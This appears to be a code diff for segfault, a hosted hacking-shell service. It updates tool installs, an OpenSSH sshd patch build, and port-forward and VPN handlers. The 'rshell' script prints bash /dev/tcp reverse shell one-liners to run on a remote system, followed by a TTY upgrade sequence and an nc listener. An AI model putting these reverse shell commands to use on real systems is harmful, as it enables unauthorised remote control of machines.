RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker \
|
RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker
|
||||||
&& /pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb'
|
## YANKED. Already in apt-get install powershell/pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb'
|
||||||
RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \
|
RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \
|
||||||
&& chmod 755 /usr/bin/favfreak.py \
|
&& chmod 755 /usr/bin/favfreak.py \
|
||||||
&& ln -s favfreak.py /usr/bin/FavFreak; }' \
|
&& ln -s favfreak.py /usr/bin/FavFreak; }' \
|
||||||
|
@ -293,8 +293,10 @@ alias nocol=noansi
|
|||||||
# Make the Project name visibile in the PS1 prompt
|
# Make the Project name visibile in the PS1 prompt
|
||||||
[[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}"
|
[[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}"
|
||||||
|
|
||||||
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:$PATH"
|
|
||||||
|
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:/usr/local/go/bin:$PATH"
|
||||||
[[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples"
|
[[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples"
|
||||||
|
export PATH
|
||||||
|
|
||||||
_sf_info_non_perm()
|
_sf_info_non_perm()
|
||||||
{
|
{
|
||||||
|
@ -16,31 +16,31 @@ ERREXIT() {
|
|||||||
exit "${code:-99}"
|
exit "${code:-99}"
|
||||||
}
|
}
|
||||||
|
|
||||||
|
[[ ! -f /config/self/reverse_port ]] && curl sf/port
|
||||||
load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
||||||
load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
||||||
echo -e "\
|
echo -e "\
|
||||||
Use any of these commands on the remote system:${CDR}
|
Use one of these commands on the remote system:
|
||||||
bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'
|
1. ${CDR}bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'${CN}
|
||||||
(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &
|
2. ${CDR}(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &${CN}
|
||||||
${CN}
|
${CN}Once connected, cut & paste the following into the _this_ shell:
|
||||||
Once connected, cut & paste this into the remote shell:${CDC}
|
${CF}-------------------------------------------------------------------------------${CDC}
|
||||||
command -v python >/dev/null \\
|
command -v python >/dev/null \\
|
||||||
&& exec python -c 'import pty; pty.spawn(\"bash\")' \\
|
&& exec python -c 'import pty; pty.spawn(\"bash\")' \\
|
||||||
|| exec script -qc bash /dev/null
|
|| exec script -qc bash /dev/null
|
||||||
|
export SHELL=/bin/bash TERM=xterm-256color
|
||||||
export SHELL=/bin/bash
|
|
||||||
export TERM=xterm-256color
|
|
||||||
reset -I
|
reset -I
|
||||||
PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
|
PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
|
||||||
"'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'"
|
"'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'"
|
||||||
${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN}
|
${CN}${CF}-------------------------------------------------------------------------------${CN}
|
||||||
-----------------------------------"
|
To force-exit this listener, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} on your Root Server"
|
||||||
# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
|
# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
|
||||||
|
|
||||||
cfg=$(stty --save)
|
cfg=$(stty --save)
|
||||||
stty raw -echo opost
|
stty raw -echo opost
|
||||||
time nc -vnlp "$rport"
|
echo -e "${CDG}Listening on ${CG}${rip}:${rport}${CN}"
|
||||||
echo "Restoring TTY"
|
nc -nlp "$rport"
|
||||||
|
echo "🦋 Restoring terminal..."
|
||||||
stty "$cfg"
|
stty "$cfg"
|
||||||
# reset -I
|
# reset -I
|
||||||
|
|
||||||
|
@ -1,29 +1,34 @@
|
|||||||
|
|
||||||
|
VER=9.6p1
|
||||||
|
|
||||||
all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile
|
all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile
|
||||||
docker build --no-cache --network host -t sf-host .
|
docker build --no-cache --network host -t sf-host .
|
||||||
|
|
||||||
albuild:
|
albuild:
|
||||||
bash -c "docker run --rm alpine-gcc true || \
|
bash -c "docker run --rm sf-alpine-gcc true || \
|
||||||
docker commit alpine-gcc alpine-gcc || { \
|
docker commit sf-alpine-gcc sf-alpine-gcc || { \
|
||||||
docker run --network host --name alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
|
docker run --network host --name sf-alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
|
||||||
&& docker commit alpine-gcc alpine-gcc; }"
|
&& docker commit sf-alpine-gcc sf-alpine-gcc; }"
|
||||||
|
|
||||||
# See mk_sshd.sh for manual debugging
|
# See mk_sshd.sh for manual debugging
|
||||||
fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh
|
fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh
|
||||||
docker run --rm -v$$(pwd):/src --net=host -w /tmp alpine-gcc /src/mk_sshd.sh
|
docker run --rm -v$$(pwd):/src --net=host -w /tmp --env VER=$(VER) sf-alpine-gcc /src/mk_sshd.sh
|
||||||
|
@echo "Type 'make diff' to create a sf-sshd-$(VER).patch"
|
||||||
|
|
||||||
fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c
|
fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c
|
||||||
docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
|
docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
|
||||||
@echo SUCCESS
|
@echo SUCCESS
|
||||||
|
|
||||||
fs-root/bin/unix-socket-client: unix-socket-client.c
|
fs-root/bin/unix-socket-client: unix-socket-client.c
|
||||||
docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
|
docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
|
||||||
@echo SUCCESS
|
@echo SUCCESS
|
||||||
|
|
||||||
diff:
|
diff:
|
||||||
cd dev && \
|
cd dev && \
|
||||||
diff -x '!*.[ch]' -u openssh-9.2p1-orig/ openssh-9.2p1-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd.patch
|
diff -x '!*.[ch]' -u openssh-$(VER)-orig/ openssh-$(VER)-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd-$(VER).patch
|
||||||
|
@echo "May want to 'mv sf-sshd-$(VER).patch sf-sshd.patch'."
|
||||||
|
|
||||||
clean:
|
clean:
|
||||||
rm -rf openssh-9.2p1-sf fs-root/usr/sbin/sshd
|
rm -rf openssh-$(VER)-orig openssh-$(VER)-sf fs-root/usr/sbin/sshd
|
||||||
docker image rm alpine-gcc
|
docker image rm sf-alpine-gcc
|
||||||
|
|
||||||
|
@ -424,7 +424,7 @@ print_goodbye()
|
|||||||
|
|
||||||
# Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick
|
# Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick
|
||||||
# Note: pgrep is executed in user's context. Treat the output with care and do not trust it.
|
# Note: pgrep is executed in user's context. Treat the output with care and do not trust it.
|
||||||
n=$(bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
|
n=$(timeout 2 bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
|
||||||
[[ -z "$n" ]] && n=0
|
[[ -z "$n" ]] && n=0
|
||||||
[[ ${#n} -gt 5 ]] && n=0
|
[[ ${#n} -gt 5 ]] && n=0
|
||||||
[[ ! $n -eq $n ]] && n=0
|
[[ ! $n -eq $n ]] && n=0
|
||||||
@ -435,7 +435,7 @@ print_goodbye()
|
|||||||
str="process is"
|
str="process is"
|
||||||
[[ "$n" -gt 1 ]] && str="processes are"
|
[[ "$n" -gt 1 ]] && str="processes are"
|
||||||
echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}"
|
echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}"
|
||||||
exec_errnull docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
|
exec_errnull timeout 2 docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
|
||||||
echo -e "\
|
echo -e "\
|
||||||
-------> The encrypted filesystem in /sec will remain accessible until
|
-------> The encrypted filesystem in /sec will remain accessible until
|
||||||
-------> the last shell exits or all background processes terminate.
|
-------> the last shell exits or all background processes terminate.
|
||||||
@ -443,16 +443,6 @@ print_goodbye()
|
|||||||
-------> This will also make /sec unavailabe until your next log in."
|
-------> This will also make /sec unavailabe until your next log in."
|
||||||
fi
|
fi
|
||||||
echo -en "\r"
|
echo -en "\r"
|
||||||
[[ -z $SF_IS_PAYING ]] && {
|
|
||||||
echo -e "\
|
|
||||||
${CDY}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
|
||||||
@@@ ${CDG}** GET MORE MEMORY, SPEED, STORAGE AND NO RESTRICTIONS **${CDY} @@@
|
|
||||||
@@@ ${CDR}${CUL}https://www.thc.org/segfault/free${CN}${CDY} @@@
|
|
||||||
@@@ ${CB}${CUL}https://www.thc.org/segfault/upgrade${CN}${CDY} @@@
|
|
||||||
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@${CN}"
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
sysmsg "/config/host/etc/logoutmsg-all.sh"
|
sysmsg "/config/host/etc/logoutmsg-all.sh"
|
||||||
|
|
||||||
echo -e "\
|
echo -e "\
|
||||||
@ -536,7 +526,7 @@ spawn_shell_exit()
|
|||||||
tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip"
|
tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip"
|
||||||
[[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip"
|
[[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip"
|
||||||
# Request a reverse Port Forward
|
# Request a reverse Port Forward
|
||||||
[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull docker exec --user 0:0 "lg-${LID}" curl -s sf/port
|
[[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull timeout 2 docker exec --user 0:0 "lg-${LID}" curl -s sf/port
|
||||||
|
|
||||||
|
|
||||||
# Warn user if this is the last server by IP (after semaphore has been released)
|
# Warn user if this is the last server by IP (after semaphore has been released)
|
||||||
@ -1400,7 +1390,7 @@ exec_devnull docker exec sf-master /ready-lg.sh "${LID}" "${C_IP}" "${LG_PID}" "
|
|||||||
# Setup container (within container's namespace)
|
# Setup container (within container's namespace)
|
||||||
unset WGNAME_UP
|
unset WGNAME_UP
|
||||||
[[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")"
|
[[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")"
|
||||||
exec_devnull docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
|
exec_devnull timeout 5 docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..."
|
||||||
touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY"
|
touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY"
|
||||||
tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip"
|
tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip"
|
||||||
|
|
||||||
|
@ -11,11 +11,17 @@
|
|||||||
DSTDIR="/src/fs-root/usr/sbin"
|
DSTDIR="/src/fs-root/usr/sbin"
|
||||||
DSTBIN="${DSTDIR}/sshd"
|
DSTBIN="${DSTDIR}/sshd"
|
||||||
set -e
|
set -e
|
||||||
SRCDIR="/tmp/openssh-9.2p1"
|
SRCDIR="/src/dev/openssh-${VER:?}-sf"
|
||||||
|
[[ ! -d "/src/dev" ]] && mkdir -p "/src/dev"
|
||||||
|
cd /src/dev
|
||||||
[[ ! -d "$SRCDIR" ]] && {
|
[[ ! -d "$SRCDIR" ]] && {
|
||||||
# Cloudflare to often returns 503 - "BLOCKED"
|
# Cloudflare to often returns 503 - "BLOCKED"
|
||||||
# wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
|
# wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
|
||||||
wget -O- https://artfiles.org/openbsd/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz -
|
wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz"
|
||||||
|
tar xfz "openssh-${VER}.tar.gz"
|
||||||
|
mv "openssh-${VER}" "openssh-${VER}-orig"
|
||||||
|
tar xfz "openssh-${VER}.tar.gz"
|
||||||
|
mv "openssh-${VER}" "${SRCDIR}"
|
||||||
|
|
||||||
cd "$SRCDIR"
|
cd "$SRCDIR"
|
||||||
|
|
||||||
@ -39,5 +45,5 @@ strip sshd
|
|||||||
[[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}"
|
[[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}"
|
||||||
cp sshd "${DSTBIN}"
|
cp sshd "${DSTBIN}"
|
||||||
chmod 755 "${DSTBIN}"
|
chmod 755 "${DSTBIN}"
|
||||||
rm -rf "${SRCDIR:?}"
|
# rm -rf "${SRCDIR:?}"
|
||||||
|
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-sf/channels.c
|
diff -x !*.[ch] -u openssh-9.6p1-orig/channels.c openssh-9.6p1-sf/channels.c
|
||||||
--- openssh-9.2p1-orig/channels.c 2023-02-02 12:21:54
|
--- openssh-9.6p1-orig/channels.c 2023-12-18 14:59:50
|
||||||
+++ openssh-9.2p1-sf/channels.c 2023-08-15 06:13:05
|
+++ openssh-9.6p1-sf/channels.c 2024-01-20 17:50:15
|
||||||
@@ -3639,7 +3639,7 @@
|
@@ -3683,7 +3683,7 @@
|
||||||
ssh->chanctxt->IPv4or6 = af;
|
ssh->chanctxt->IPv4or6 = af;
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -10,7 +10,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
|
|||||||
/*
|
/*
|
||||||
* Determine whether or not a port forward listens to loopback, the
|
* Determine whether or not a port forward listens to loopback, the
|
||||||
* specified address or wildcard. On the client, a specified bind
|
* specified address or wildcard. On the client, a specified bind
|
||||||
@@ -3677,6 +3677,7 @@
|
@@ -3721,6 +3721,7 @@
|
||||||
* address and it was overridden.
|
* address and it was overridden.
|
||||||
*/
|
*/
|
||||||
if (*listen_addr != '\0' &&
|
if (*listen_addr != '\0' &&
|
||||||
@ -18,10 +18,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s
|
|||||||
strcmp(listen_addr, "0.0.0.0") != 0 &&
|
strcmp(listen_addr, "0.0.0.0") != 0 &&
|
||||||
strcmp(listen_addr, "*") != 0) {
|
strcmp(listen_addr, "*") != 0) {
|
||||||
ssh_packet_send_debug(ssh,
|
ssh_packet_send_debug(ssh,
|
||||||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1-sf/serverloop.c
|
diff -x !*.[ch] -u openssh-9.6p1-orig/serverloop.c openssh-9.6p1-sf/serverloop.c
|
||||||
--- openssh-9.2p1-orig/serverloop.c 2023-02-02 12:21:54
|
--- openssh-9.6p1-orig/serverloop.c 2023-12-18 14:59:50
|
||||||
+++ openssh-9.2p1-sf/serverloop.c 2023-08-15 06:18:17
|
+++ openssh-9.6p1-sf/serverloop.c 2024-01-20 17:50:15
|
||||||
@@ -102,6 +102,12 @@
|
@@ -101,6 +101,12 @@
|
||||||
/* requested tunnel forwarding interface(s), shared with session.c */
|
/* requested tunnel forwarding interface(s), shared with session.c */
|
||||||
char *tun_fwd_ifnames = NULL;
|
char *tun_fwd_ifnames = NULL;
|
||||||
|
|
||||||
@ -34,7 +34,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||||||
/* returns 1 if bind to specified port by specified user is permitted */
|
/* returns 1 if bind to specified port by specified user is permitted */
|
||||||
static int
|
static int
|
||||||
bind_permitted(int port, uid_t uid)
|
bind_permitted(int port, uid_t uid)
|
||||||
@@ -391,8 +397,10 @@
|
@@ -388,8 +394,10 @@
|
||||||
/* Clean up sessions, utmp, etc. */
|
/* Clean up sessions, utmp, etc. */
|
||||||
cleanup_exit(255);
|
cleanup_exit(255);
|
||||||
}
|
}
|
||||||
@ -46,7 +46,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||||||
if (conn_in_ready &&
|
if (conn_in_ready &&
|
||||||
process_input(ssh, connection_in) < 0)
|
process_input(ssh, connection_in) < 0)
|
||||||
break;
|
break;
|
||||||
@@ -637,12 +645,14 @@
|
@@ -634,12 +642,14 @@
|
||||||
|
|
||||||
if (strcmp(ctype, "session") == 0) {
|
if (strcmp(ctype, "session") == 0) {
|
||||||
c = server_request_session(ssh);
|
c = server_request_session(ssh);
|
||||||
@ -67,7 +67,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||||||
}
|
}
|
||||||
if (c != NULL) {
|
if (c != NULL) {
|
||||||
debug_f("confirm %s", ctype);
|
debug_f("confirm %s", ctype);
|
||||||
@@ -802,8 +812,20 @@
|
@@ -799,8 +809,20 @@
|
||||||
ssh_packet_send_debug(ssh, "Server has disabled port forwarding.");
|
ssh_packet_send_debug(ssh, "Server has disabled port forwarding.");
|
||||||
} else {
|
} else {
|
||||||
/* Start listening on the port */
|
/* Start listening on the port */
|
||||||
@ -90,10 +90,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1
|
|||||||
}
|
}
|
||||||
if ((resp = sshbuf_new()) == NULL)
|
if ((resp = sshbuf_new()) == NULL)
|
||||||
fatal_f("sshbuf_new");
|
fatal_f("sshbuf_new");
|
||||||
diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/sshd.c
|
diff -x !*.[ch] -u openssh-9.6p1-orig/sshd.c openssh-9.6p1-sf/sshd.c
|
||||||
--- openssh-9.2p1-orig/sshd.c 2023-02-02 12:21:54
|
--- openssh-9.6p1-orig/sshd.c 2023-12-18 14:59:50
|
||||||
+++ openssh-9.2p1-sf/sshd.c 2023-08-15 06:13:05
|
+++ openssh-9.6p1-sf/sshd.c 2024-01-20 17:50:15
|
||||||
@@ -536,8 +536,71 @@
|
@@ -531,8 +531,71 @@
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -165,7 +165,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/ss
|
|||||||
privsep_postauth(struct ssh *ssh, Authctxt *authctxt)
|
privsep_postauth(struct ssh *ssh, Authctxt *authctxt)
|
||||||
{
|
{
|
||||||
#ifdef DISABLE_FD_PASSING
|
#ifdef DISABLE_FD_PASSING
|
||||||
@@ -576,8 +639,34 @@
|
@@ -571,8 +634,34 @@
|
||||||
|
|
||||||
reseed_prngs();
|
reseed_prngs();
|
||||||
|
|
||||||
|
@ -47,6 +47,23 @@ Sanitize()
|
|||||||
[[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..."
|
[[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..."
|
||||||
}
|
}
|
||||||
|
|
||||||
|
InitColors() {
|
||||||
|
# COLOR is set (to 'always')
|
||||||
|
Y=$CDY
|
||||||
|
C=$CDC
|
||||||
|
R=$CDR
|
||||||
|
RR=$CR
|
||||||
|
G=$CDG
|
||||||
|
B=$CB
|
||||||
|
M=$CDM
|
||||||
|
YY=$CY
|
||||||
|
W=$CW
|
||||||
|
N=$CN
|
||||||
|
F=$CF
|
||||||
|
ICON_ERROR="💥 "
|
||||||
|
ICON_WARN="💥 "
|
||||||
|
}
|
||||||
|
|
||||||
GetFormVars()
|
GetFormVars()
|
||||||
{
|
{
|
||||||
local IFS
|
local IFS
|
||||||
@ -71,7 +88,6 @@ GetFormVars()
|
|||||||
[[ ${key} == "config" ]] && {
|
[[ ${key} == "config" ]] && {
|
||||||
R_CONFIG="${val//[^[:alnum:]-_+\/.]}"
|
R_CONFIG="${val//[^[:alnum:]-_+\/.]}"
|
||||||
[[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG
|
[[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG
|
||||||
[[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
|
|
||||||
}
|
}
|
||||||
[[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}"
|
[[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}"
|
||||||
[[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}"
|
[[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}"
|
||||||
@ -128,6 +144,9 @@ GetFormVars()
|
|||||||
[[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}"
|
[[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}"
|
||||||
}
|
}
|
||||||
done
|
done
|
||||||
|
|
||||||
|
[[ -n $COLOR ]] && InitColors
|
||||||
|
[[ -n "$R_CONFIG" ]] && [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}"
|
||||||
}
|
}
|
||||||
|
|
||||||
# Load PID of WireGuard container
|
# Load PID of WireGuard container
|
||||||
@ -685,9 +704,10 @@ BLPOP portd:response-${LID} 5" | redr) || return
|
|||||||
|
|
||||||
# The PortD add's a /sf/run/self/reverse_forward.
|
# The PortD add's a /sf/run/self/reverse_forward.
|
||||||
echo -en "\
|
echo -en "\
|
||||||
${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N}
|
${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} for details.
|
||||||
${M}🤭 Tip${N}: Type ${C}rshell${N}
|
${M}🤭 Tip${N}: Type ${C}rshell${N} to start listening.
|
||||||
${G}👾 New reverse Port is ${Y}${ipport}${CN}"
|
${M}🛜 Tip${N}: Type ${C}curl sf/port${N} to assign a new port.
|
||||||
|
${G}👾 Your reverse Port is ${Y}${ipport}${CN}"
|
||||||
|
|
||||||
# portd.sh automaticaly adds this to /config/self/reverse_*
|
# portd.sh automaticaly adds this to /config/self/reverse_*
|
||||||
exit
|
exit
|
||||||
@ -807,22 +827,7 @@ cmd_wg_show()
|
|||||||
0<&- # Close STDIN
|
0<&- # Close STDIN
|
||||||
Sanitize
|
Sanitize
|
||||||
GetFormVars
|
GetFormVars
|
||||||
[[ -n $COLOR ]] && {
|
|
||||||
# COLOR is set (to 'always')
|
|
||||||
Y=$CDY
|
|
||||||
C=$CDC
|
|
||||||
R=$CDR
|
|
||||||
RR=$CR
|
|
||||||
G=$CDG
|
|
||||||
B=$CB
|
|
||||||
M=$CDM
|
|
||||||
YY=$CY
|
|
||||||
W=$CW
|
|
||||||
N=$CN
|
|
||||||
F=$CF
|
|
||||||
ICON_ERROR="💥 "
|
|
||||||
ICON_WARN="💥 "
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
[[ "${FCGI_CMD}" == "dmesg" ]] && {
|
[[ "${FCGI_CMD}" == "dmesg" ]] && {
|
||||||
@ -836,13 +841,13 @@ GetFormVars
|
|||||||
# If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*)
|
# If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*)
|
||||||
[[ -n $SF_OVPN_HACK ]] && {
|
[[ -n $SF_OVPN_HACK ]] && {
|
||||||
wg_net_init
|
wg_net_init
|
||||||
[[ ${ARGS[1]} == 'vpn' ]] && {
|
[[ ${ARGS[1]} == 'ovpn' ]] && {
|
||||||
source "/sf/bin/funcs_vpn.sh"
|
source "/sf/bin/funcs_ovpn.sh"
|
||||||
[[ ${ARGS[2]} == 'up' ]] && cmd_vpn_up
|
[[ ${ARGS[2]} == 'up' ]] && cmd_ovpn_up
|
||||||
[[ ${ARGS[2]} == 'show' ]] && cmd_vpn_show
|
[[ ${ARGS[2]} == 'show' ]] && cmd_ovpn_show
|
||||||
[[ ${ARGS[2]} == 'del' ]] && cmd_vpn_del
|
[[ ${ARGS[2]} == 'del' ]] && cmd_ovpn_del
|
||||||
[[ ${ARGS[2]} == 'down' ]] && cmd_vpn_del
|
[[ ${ARGS[2]} == 'down' ]] && cmd_ovpn_del
|
||||||
cmd_vpn_help
|
cmd_ovpn_help
|
||||||
exit
|
exit
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -869,14 +874,14 @@ wg_net_init
|
|||||||
exit
|
exit
|
||||||
}
|
}
|
||||||
|
|
||||||
[[ "${FCGI_CMD}" == "vpn" ]] && {
|
[[ "${FCGI_CMD}" == "ovpn" ]] && {
|
||||||
source "/sf/bin/funcs_vpn.sh"
|
source "/sf/bin/funcs_ovpn.sh"
|
||||||
[[ ${ARGS[1]} == 'up' ]] && cmd_vpn_up
|
